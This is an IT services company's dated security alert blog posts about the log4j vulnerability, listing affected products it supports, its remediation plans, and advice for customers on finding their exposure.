UPDATE: December 21, 2021- We have identified the products Systems Engineering sells and supports that are impacted by the log4j vulnerability. Affected products are listed below along with our plans to address each.
- The following products will be addressed during scheduled network administration engagements for those customers with SE NetAdmin service.
- Symantec Endpoint Protection Manager
Please note this is NOT the product we use for our SE Essentials, SE Desktop Defense, and SE Secure customers as a managed anti-virus solution. - VMware v-Center
- Symantec Endpoint Protection Manager
- For both products below, we will reach out to customers to scope and schedule remediation.
- Cisco Identity Service Engine (ISE)
- NetApp ONTAP
- The vulnerable product below will require an upgrade due to end-of-support.
- Cisco Call Manager v11.5. Upgrade to v12.5
For customers who have not previously planned this upgrade, we will reach out directly to scope and schedule remediation.
- Cisco Call Manager v11.5. Upgrade to v12.5
- For the product below, we are waiting on the cloud service provider to apply the patch. (See earlier statements below for more information on this standard practice)
- Polycom Real Connect for Teams.
The vendor has stated that work will be completed this week.
- Polycom Real Connect for Teams.
The log4j vulnerability is a good reminder of why a layered approach to security is important. All the products listed above are behind a firewall that has an intrusion prevention system (IPS) that will detect an attack attempting to use this vulnerability. We are also monitoring our SE EventWatch customers for any log4j indicators of compromise (IOC). Finally, nothing can be a substitute for a regularly scheduled and well-designed security awareness training program.
Customers, who may be impacted, and would like to engage Systems Engineering on a more immediate basis should reach out to their account manager. We have put an Incident Response procedure in place to address these requests.
SECURITY ALERT UPDATE: December 15, 2021
MOVING FROM EXTERNAL TO INTERNAL THREAT
Since the announcement of this vulnerability, we have seen the cloud service provider industry (those applications our customers and we use from the cloud) rapidly respond to this serious threat. Still, if you have cloud-hosted line of business (LOB) applications, you should be looking for the vendor's response to the Log4j vulnerability and steps they have taken to address this threat if impacted.
We are encouraged to see that external cloud application providers have done an excellent job remediating the risk of this vulnerability. The focus now needs to shift to the internal network.
Systems Engineering is currently cataloging any potential exposure to this vulnerability from our vendors and the products we sell and support. We are heeding their guidance on addressing the vulnerability; then, we will start to scope and prioritize our response. This is our standard practice for internal vulnerabilities that exist, so long as they also have the protection of a firewall. We only deploy approved patches directly from the vendor, rather than looking to various crowd-sourced or vendor workarounds. Such workarounds come at a higher risk and may bring unnecessary disruption to the business.
While Systems Engineering is analyzing this threat, our customers should be cataloging their potential exposures, such as;
- Any application running on your network, in your office, or data center that might be exposed to the Internet. This is not common for most small to medium-sized organizations, but you might have line of business applications with a web interface for third-party or field staff access.
- If you running any task-specific appliances on your network, these may have administrative interfaces which are vulnerable to this threat.
- If you use IoT devices, like smart thermostats, ensure these are securely separated from your business network.
Finally, continue to follow this blog. We will update as we have more information or the situation changes. You can also call your Systems Engineering Account Manager with any specific questions.
SECURITY ALERT: December 13, 2021
On Saturday, December 11, 2021, CISA released a statement on the "log4j" vulnerability CVE-2021-44228. This is a serious vulnerability affecting any application exposed to the Internet while using the popular Java logging framework
While Microsoft Windows and Office 365 are not directly affected, you may be running an on-premises application that uses Java which should be protected behind a firewall. It is also likely that your cloud or Software-as-a-Service (SaaS) applications are affected.
The other source of exposure is Internet of Things and other network devices that have Java embedded. For devices that Systems Engineering sells and supports, we are monitoring vendor security notifications for exposure and will implement any mitigation steps required.
COURSE OF ACTION
For all businesses, we recommend reviewing statements from your SaaS providers relating to the log4j-CVE-2021-44228 vulnerability.
For clients, we are monitoring systems across our SE EventWatch customer base, looking for suspicious activities related to this vulnerability. At this time, we can see inbound activities attempting to exploit this vulnerability. However, we have yet to observe related outbound communications, which would indicate a successful attack.
In regards to Systems Engineering's own systems, we have verified that we are not affected, are patched, or are deployed in a secure configuration to prevent external access.
We will continue to keep a close eye on this vulnerability and will update this Security Alert as more information becomes available. In the meantime, if you have questions about this Security Alert and are a Systems Engineering customer, please reach out to your Account Manager.